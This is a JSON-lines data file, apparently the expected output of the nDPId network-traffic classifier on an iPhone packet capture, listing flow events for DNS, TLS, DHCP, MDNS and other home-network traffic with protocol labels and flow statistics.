00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1582454600545,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454600545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAHHAqAIRX2UYNcWcAbsi3fgfxZi1QIAQBAsSJAAAAQEIChHf76yI0z6t"}
00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454600508,"flow_last_seen":1582454600545,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454600508,"flow_last_seen":1582454600580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600580,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1582454598252,"flow_last_seen":1582454599058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12558,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1582454598587,"flow_last_seen":1582454600617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10875,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1582454598721,"flow_last_seen":1582454600748,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":73228,"flow_avg_l4_payload_len":951,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454599225,"flow_last_seen":1582454600287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454599740,"flow_last_seen":1582454600279,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7913,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}}
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598205,"flow_last_seen":1582454598247,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}}
00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454553219,"flow_last_seen":1582454596366,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":2100,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454595839,"flow_last_seen":1582454599396,"flow_idle_time":180000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}}
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454599396,"flow_last_seen":1582454600443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4485,"flow_avg_l4_payload_len":373,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454599396,"flow_last_seen":1582454600443,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4485,"flow_avg_l4_payload_len":373,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}}
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598204,"flow_last_seen":1582454598247,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}}
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1955,"flow_avg_l4_payload_len":488,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454598888,"flow_last_seen":1582454599079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454598888,"flow_last_seen":1582454599079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1582454598885,"flow_last_seen":1582454599226,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}}
00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595352,"flow_last_seen":1582454596370,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454598385,"flow_last_seen":1582454599058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5314,"flow_avg_l4_payload_len":295,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454598385,"flow_last_seen":1582454599058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5314,"flow_avg_l4_payload_len":295,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454552576,"flow_last_seen":1582454582628,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454598766,"flow_last_seen":1582454598934,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5815,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454598766,"flow_last_seen":1582454598934,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5815,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":180000,"flow_min_l4_payload_len":362,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1881,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":120000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1582454599934,"flow_last_seen":1582454600426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9568,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1582454599934,"flow_last_seen":1582454600426,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9568,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}}
00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454560698,"flow_last_seen":1582454560698,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.1","src_port":5351,"dst_port":5350,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
